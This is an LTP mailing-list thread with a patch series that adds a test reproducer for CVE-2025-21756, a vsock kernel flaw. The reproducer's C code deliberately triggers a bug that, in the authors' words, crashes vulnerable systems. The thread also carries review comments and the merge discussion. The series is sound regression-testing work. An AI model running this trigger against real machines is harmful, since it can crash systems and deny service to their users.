* [LTP] [PATCH v2 0/2] cve-2025-21756 reproducer
@ 2025-09-23  8:40 Andrea Cervesato
  2025-09-23  8:40 ` [LTP] [PATCH v2 1/2] lapi: add struct sockaddr_vm fallback Andrea Cervesato
  2025-09-23  8:41 ` [LTP] [PATCH v2 2/2] cve: add test reproducer for cve-2025-21756 Andrea Cervesato
From: Andrea Cervesato @ 2025-09-23  8:40 UTC (permalink / raw)
  To: ltp

Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
---
Changes in v2:
- fallback definition of sockaddr_vm
- check for tainted system if kernel survived after test
- Link to v1: https://lore.kernel.org/r/20250922-cve-2025-21756-v1-1-074da211288a@suse.com

---
Andrea Cervesato (2):
      lapi: add struct sockaddr_vm fallback
      cve: add test reproducer for cve-2025-21756

 configure.ac                   |  2 +
 include/lapi/vm_sockets.h      | 17 ++++++++
 runtest/cve                    |  1 +
 testcases/cve/.gitignore       |  1 +
 testcases/cve/cve-2025-21756.c | 95 ++++++++++++++++++++++++++++++++++++++++++
 5 files changed, 116 insertions(+)
---
base-commit: 514dd3b48fdb024a18657b56fe30cea28541c0d0
change-id: 20250922-cve-2025-21756-e1afcda7b2d4

Best regards,
-- 
Andrea Cervesato <andrea.cervesato@suse.com>


-- 
Mailing list info: https://lists.linux.it/listinfo/ltp


* [LTP] [PATCH v2 1/2] lapi: add struct sockaddr_vm fallback
  2025-09-23  8:40 [LTP] [PATCH v2 0/2] cve-2025-21756 reproducer Andrea Cervesato
@ 2025-09-23  8:40 ` Andrea Cervesato
  2025-09-23 11:52   ` Cyril Hrubis
  2025-09-23  8:41 ` [LTP] [PATCH v2 2/2] cve: add test reproducer for cve-2025-21756 Andrea Cervesato
From: Andrea Cervesato @ 2025-09-23  8:40 UTC (permalink / raw)
  To: ltp

From: Andrea Cervesato <andrea.cervesato@suse.com>

Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
---
 configure.ac              |  2 ++
 include/lapi/vm_sockets.h | 17 +++++++++++++++++
 2 files changed, 19 insertions(+)

diff --git a/configure.ac b/configure.ac
index 62ae27d494474fe342b1cceeac7f4c21c0b1028c..813f4c8525ea8f79852a419375ad797cb9fe2f50 100644
--- a/configure.ac
+++ b/configure.ac
@@ -270,6 +270,8 @@ AC_CHECK_TYPES([struct file_attr],,,[#include <linux/fs.h>])
 
 AC_CHECK_TYPES([struct fsxattr],,,[#include <linux/fs.h>])
 
+AC_CHECK_TYPES([struct sockaddr_vm],,,[#include <linux/vm_sockets.h>])
+
 # Tools knobs
 
 # Bash
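Review bot: the type check's prelude includes only <linux/vm_sockets.h>, whereas the consumer in lapi/vm_sockets.h includes <sys/socket.h> before it; if the check fails on a system where the uapi header is present and already defines the struct, HAVE_STRUCT_SOCKADDR_VM stays undefined and the fallback definition in lapi/vm_sockets.h gets compiled next to the real one, which is a redefinition error. Use the same include sequence as the lapi header in the check, i.e. `[#include <sys/socket.h>` followed by `#include <linux/vm_sockets.h>]`, so that the configure result mirrors what the header actually sees at compile time.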
diff --git a/include/lapi/vm_sockets.h b/include/lapi/vm_sockets.h
index 07884e538688569b5325b251fd629f20e44c1cdb..fda8c3156dc34b39fc2e91fba090bff00e209fc0 100644
--- a/include/lapi/vm_sockets.h
+++ b/include/lapi/vm_sockets.h
@@ -7,6 +7,7 @@
 #define LAPI_VM_SOCKETS_H__
 
 #include <sys/socket.h>
+#include "config.h"
 
 #if HAVE_LINUX_VM_SOCKETS_H
 #  include <linux/vm_sockets.h>
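Review bot: `#include "config.h"` should go before <sys/socket.h> rather than after it; config.h is where configure's feature macros land and LTP headers include it first so those macros are visible before any system header is parsed. The include itself is the right fix, since HAVE_LINUX_VM_SOCKETS_H on the next line is also a config.h macro and this header previously relied on its includer having pulled config.h in.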
@@ -16,4 +17,20 @@
 #  define VMADDR_CID_LOCAL 1
 #endif
 
+#ifndef HAVE_STRUCT_SOCKADDR_VM
+struct sockaddr_vm {
+	unsigned short svm_family;
+	unsigned short svm_reserved1;
+	unsigned int svm_port;
+	unsigned int svm_cid;
+	unsigned char svm_flags;
+	unsigned char svm_zero[sizeof(struct sockaddr) -
+			       sizeof(sa_family_t) -
+			       sizeof(unsigned short) -
+			       sizeof(unsigned int) -
+			       sizeof(unsigned int) -
+			       sizeof(unsigned char)];
+};
+#endif
+
 #endif /* LAPI_VM_SOCKETS_H__ */
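Review bot: svm_family is declared as `unsigned short` while the svm_zero length subtracts `sizeof(sa_family_t)`; both are 2 bytes on Linux, so the resulting layout is right (16 - 2 - 2 - 4 - 4 - 1 leaves 3 bytes of padding), but declaring the field as `sa_family_t svm_family;` keeps the declaration and the arithmetic in step with each other and with the type already used in the expression. A one-line comment saying that this fallback mirrors the uapi struct layout would also help the next person who has to compare it against the kernel header.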

-- 
2.51.0



* [LTP] [PATCH v2 2/2] cve: add test reproducer for cve-2025-21756
  2025-09-23  8:40 [LTP] [PATCH v2 0/2] cve-2025-21756 reproducer Andrea Cervesato
  2025-09-23  8:40 ` [LTP] [PATCH v2 1/2] lapi: add struct sockaddr_vm fallback Andrea Cervesato
@ 2025-09-23  8:41 ` Andrea Cervesato
  2025-09-23 11:55   ` Cyril Hrubis
From: Andrea Cervesato @ 2025-09-23  8:41 UTC (permalink / raw)
  To: ltp

From: Andrea Cervesato <andrea.cervesato@suse.com>

This test is verifying kernel commit fcdd2242c023 "vsock: Keep the
binding until socket destruction" merged inside v6.14.

Beware, it will crash the system!

Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
---
 runtest/cve                    |  1 +
 testcases/cve/.gitignore       |  1 +
 testcases/cve/cve-2025-21756.c | 95 ++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 97 insertions(+)

diff --git a/runtest/cve b/runtest/cve
index 6d575aa2165bcd46e5ca36a07db33f69a91bd94a..c3ecd74dd9f837924b810b7b431ebb911d809966 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -92,3 +92,4 @@ cve-2020-25704 perf_event_open03
 cve-2022-0185 fsconfig03
 cve-2022-4378 cve-2022-4378
 cve-2025-38236 cve-2025-38236
+cve-2025-21756 cve-2025-21756
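Review bot: the new entry is appended after cve-2025-38236, but the visible context is in ascending CVE order (cve-2020-25704, cve-2022-0185, cve-2022-4378, cve-2025-38236); inserting `cve-2025-21756 cve-2025-21756` before the cve-2025-38236 line keeps that ordering intact.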
diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
index 8eb17ce56b01070e47917f9bb44cf146c0c5b338..dc1dad5b0d0d02a3ab57e72516c33ee7949c8431 100644
--- a/testcases/cve/.gitignore
+++ b/testcases/cve/.gitignore
@@ -14,3 +14,4 @@ cve-2022-4378
 icmp_rate_limit01
 tcindex01
 cve-2025-38236
+cve-2025-21756
diff --git a/testcases/cve/cve-2025-21756.c b/testcases/cve/cve-2025-21756.c
new file mode 100644
index 0000000000000000000000000000000000000000..80fb84c473207fb2497f6ca6bb53166f0b1734cc
--- /dev/null
+++ b/testcases/cve/cve-2025-21756.c
@@ -0,0 +1,95 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (c) 2025 Andrea Cervesato <andrea.cervesato@suse.com>
+ */
+
+/*\
+ * Test for CVE-2025-21756 fixed in kernel v6.14:
+ * fcdd2242c023 vsock: Keep the binding until socket destruction
+ *
+ * Reproducer based on:
+ * https://lore.kernel.org/all/20250128-vsock-transport-vs-autobind-v3-5-1cf57065b770@rbox.co/
+ *
+ * Beware, this test will crash the system.
+ */
+
+#include "tst_test.h"
+#include "lapi/vm_sockets.h"
+
+#define MAX_PORT_RETRIES	24
+#define VMADDR_CID_NONEXISTING	42
+
+static int vsock_bind(unsigned int cid, unsigned int port, int type)
+{
+	int sock;
+
+	struct sockaddr_vm sa = {
+		.svm_family = AF_VSOCK,
+		.svm_cid = cid,
+		.svm_port = port,
+	};
+
+	sock = SAFE_SOCKET(AF_VSOCK, type, 0);
+
+	if (bind(sock, (struct sockaddr *)&sa, sizeof(sa)) == -1) {
+		if (errno == EINVAL)
+			tst_brk(TCONF, "VM socket is not supported");
+
+		tst_brk(TBROK | TERRNO, "bind() error");
+	}
+
+	return sock;
+}
+
+static void run(void)
+{
+	int sockets[MAX_PORT_RETRIES];
+	struct sockaddr_vm addr;
+	int socket, sock_count;
+	socklen_t alen;
+
+	socket = vsock_bind(VMADDR_CID_LOCAL, VMADDR_PORT_ANY, SOCK_SEQPACKET);
+
+	alen = sizeof(addr);
+	SAFE_GETSOCKNAME(socket, (struct sockaddr *)&addr, &alen);
+
+	for (sock_count = 0; sock_count < MAX_PORT_RETRIES; ++sock_count) {
+		sockets[sock_count] = vsock_bind(VMADDR_CID_ANY,
+				   ++addr.svm_port, SOCK_SEQPACKET);
+	}
+
+	SAFE_CLOSE(socket);
+
+	socket = SAFE_SOCKET(AF_VSOCK, SOCK_SEQPACKET, 0);
+	if (!connect(socket, (struct sockaddr *)&addr, alen))
+		tst_brk(TBROK, "Unexpected connect() #1 success");
+
+	addr.svm_cid = VMADDR_CID_NONEXISTING;
+	if (!connect(socket, (struct sockaddr *)&addr, alen))
+		tst_brk(TBROK, "Unexpected connect() #2 success");
+
+	addr.svm_cid = VMADDR_CID_LOCAL;
+	addr.svm_port = VMADDR_PORT_ANY;
+
+	/* Vulnerable system may crash now. */
+	SAFE_BIND(socket, (struct sockaddr *)&addr, alen);
+	SAFE_CLOSE(socket);
+
+	if (tst_taint_check())
+		tst_res(TFAIL, "Kernel is vulnerable");
+	else
+		tst_res(TPASS, "Kernel survived after socket unbinding");
+
+	while (sock_count--)
+		SAFE_CLOSE(sockets[sock_count]);
+}
+
+static struct tst_test test = {
+	.test_all = run,
+	.taint_check = TST_TAINT_W | TST_TAINT_D,
+	.tags = (const struct tst_tag[]) {
+		{"linux-git", "fcdd2242c023"},
+		{"CVE", "2025-21756"},
+		{}
+	},
+};
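Review bot: the EINVAL-to-TCONF handling in vsock_bind() only covers bind(); the SAFE_SOCKET(AF_VSOCK, ...) call at the top of vsock_bind(), and the one before connect() #1, will report TBROK with EAFNOSUPPORT on a kernel where the vsock core is not available or the module is not loaded, and bind() to VMADDR_CID_LOCAL can fail with EADDRNOTAVAIL when no loopback transport is present. Both are environment limitations rather than test breakage, so use a plain socket() and map `errno == EAFNOSUPPORT` to TCONF the same way EINVAL is, e.g. `if (sock < 0 && errno == EAFNOSUPPORT) tst_brk(TCONF, "AF_VSOCK is not supported");`, and consider the same for EADDRNOTAVAIL on the bind. Two smaller points: the local variable `socket` shadows the libc socket() declaration, so `sock` or `fd` would read better, and the two `!connect(...)` checks only guard against unexpected success; logging errno with tst_res(TINFO, ...) after each expected failure would make it visible when a connect fails for a reason other than the one the reproducer relies on.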

-- 
2.51.0



* Re: [LTP] [PATCH v2 1/2] lapi: add struct sockaddr_vm fallback
  2025-09-23  8:40 ` [LTP] [PATCH v2 1/2] lapi: add struct sockaddr_vm fallback Andrea Cervesato
@ 2025-09-23 11:52   ` Cyril Hrubis
From: Cyril Hrubis @ 2025-09-23 11:52 UTC (permalink / raw)
  To: Andrea Cervesato; +Cc: ltp

Hi!
Reviewed-by: Cyril Hrubis <chrubis@suse.cz>

-- 
Cyril Hrubis
chrubis@suse.cz


* Re: [LTP] [PATCH v2 2/2] cve: add test reproducer for cve-2025-21756
  2025-09-23  8:41 ` [LTP] [PATCH v2 2/2] cve: add test reproducer for cve-2025-21756 Andrea Cervesato
@ 2025-09-23 11:55   ` Cyril Hrubis
  2025-09-23 12:09     ` Andrea Cervesato via ltp
From: Cyril Hrubis @ 2025-09-23 11:55 UTC (permalink / raw)
  To: Andrea Cervesato; +Cc: ltp

Hi!
> This test is verifying kernel commit fcdd2242c023 "vsock: Keep the
> binding until socket destruction" merged inside v6.14.
> 
> Beware, it will crash the system!
> 
> Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
> ---
>  runtest/cve                    |  1 +
>  testcases/cve/.gitignore       |  1 +
>  testcases/cve/cve-2025-21756.c | 95 ++++++++++++++++++++++++++++++++++++++++++
>  3 files changed, 97 insertions(+)
> 
> diff --git a/runtest/cve b/runtest/cve
> index 6d575aa2165bcd46e5ca36a07db33f69a91bd94a..c3ecd74dd9f837924b810b7b431ebb911d809966 100644
> --- a/runtest/cve
> +++ b/runtest/cve
> @@ -92,3 +92,4 @@ cve-2020-25704 perf_event_open03
>  cve-2022-0185 fsconfig03
>  cve-2022-4378 cve-2022-4378
>  cve-2025-38236 cve-2025-38236
> +cve-2025-21756 cve-2025-21756
> diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
> index 8eb17ce56b01070e47917f9bb44cf146c0c5b338..dc1dad5b0d0d02a3ab57e72516c33ee7949c8431 100644
> --- a/testcases/cve/.gitignore
> +++ b/testcases/cve/.gitignore
> @@ -14,3 +14,4 @@ cve-2022-4378
>  icmp_rate_limit01
>  tcindex01
>  cve-2025-38236
> +cve-2025-21756
> diff --git a/testcases/cve/cve-2025-21756.c b/testcases/cve/cve-2025-21756.c
> new file mode 100644
> index 0000000000000000000000000000000000000000..80fb84c473207fb2497f6ca6bb53166f0b1734cc
> --- /dev/null
> +++ b/testcases/cve/cve-2025-21756.c
> @@ -0,0 +1,95 @@
> +// SPDX-License-Identifier: GPL-2.0-or-later
> +/*
> + * Copyright (c) 2025 Andrea Cervesato <andrea.cervesato@suse.com>
> + */
> +
> +/*\
> + * Test for CVE-2025-21756 fixed in kernel v6.14:
> + * fcdd2242c023 vsock: Keep the binding until socket destruction
> + *
> + * Reproducer based on:
> + * https://lore.kernel.org/all/20250128-vsock-transport-vs-autobind-v3-5-1cf57065b770@rbox.co/
> + *
> + * Beware, this test will crash the system.
> + */
> +
> +#include "tst_test.h"
> +#include "lapi/vm_sockets.h"
> +
> +#define MAX_PORT_RETRIES	24
> +#define VMADDR_CID_NONEXISTING	42
> +
> +static int vsock_bind(unsigned int cid, unsigned int port, int type)
> +{
> +	int sock;
> +
> +	struct sockaddr_vm sa = {
> +		.svm_family = AF_VSOCK,
> +		.svm_cid = cid,
> +		.svm_port = port,
> +	};
> +
> +	sock = SAFE_SOCKET(AF_VSOCK, type, 0);

So this generally works all the way back to the oldest LTP supported
kernel? I would expect that we would need an EINVAL check here.

Otherwise:

Reviewed-by: Cyril Hrubis <chrubis@suse.cz>


-- 
Cyril Hrubis
chrubis@suse.cz


* Re: [LTP] [PATCH v2 2/2] cve: add test reproducer for cve-2025-21756
  2025-09-23 11:55   ` Cyril Hrubis
@ 2025-09-23 12:09     ` Andrea Cervesato via ltp
  2025-09-23 12:16       ` Cyril Hrubis
From: Andrea Cervesato via ltp @ 2025-09-23 12:09 UTC (permalink / raw)
  To: Cyril Hrubis, Andrea Cervesato; +Cc: ltp


On 9/23/25 1:55 PM, Cyril Hrubis wrote:
> So this generally works all the way back to the oldest LTP supported
> kernel? I would expect that we would need an EINVAL check here.

AF_VSOCK was defined in 3.10 (d021c344051a VSOCK: Introduce VM
Sockets), so I guess we are pretty safe.
Should I merge it after the Reviewed-by, or should we wait for the release?

- Andrea



* Re: [LTP] [PATCH v2 2/2] cve: add test reproducer for cve-2025-21756
  2025-09-23 12:09     ` Andrea Cervesato via ltp
@ 2025-09-23 12:16       ` Cyril Hrubis
  2025-09-23 13:28         ` Andrea Cervesato via ltp
From: Cyril Hrubis @ 2025-09-23 12:16 UTC (permalink / raw)
  To: Andrea Cervesato; +Cc: ltp

Hi!
> > So this generally works all the way back to the oldest LTP supported
> > kernel? I would expect that we would need an EINVAL check here.
> 
> AF_VSOCK were defined in 3.10 (d021c344051a VSOCK: Introduce VM 
> Sockets), so I guess we are pretty safe.

Ack.

> Should I merge it after the Review-by, or we should wait for the release?

As long as it passes the compilation CI, I would be inclined to take it
in. The pro is that we get one more CVE reproducer and the con is
that we add one buggy test; it shouldn't break more than that.

However that should be the last non-fix before the release.

-- 
Cyril Hrubis
chrubis@suse.cz


* Re: [LTP] [PATCH v2 2/2] cve: add test reproducer for cve-2025-21756
  2025-09-23 12:16       ` Cyril Hrubis
@ 2025-09-23 13:28         ` Andrea Cervesato via ltp
From: Andrea Cervesato via ltp @ 2025-09-23 13:28 UTC (permalink / raw)
  To: Cyril Hrubis; +Cc: ltp


On 9/23/25 2:16 PM, Cyril Hrubis wrote:
> Hi!
>>> So this generally works all the way back to the oldest LTP supported
>>> kernel? I would expect that we would need an EINVAL check here.
>> AF_VSOCK were defined in 3.10 (d021c344051a VSOCK: Introduce VM
>> Sockets), so I guess we are pretty safe.
> Ack.
>
>> Should I merge it after the Review-by, or we should wait for the release?
> As long as it passes the compilation CI I would be inclined to take it
> in. The pros is that we get one more CVE reproducer and the cons are
> that we add one buggy test, it shouldn't break more than that.
>
> However that should be the last non-fix before the release.
>
Merged, thanks!

- Andrea


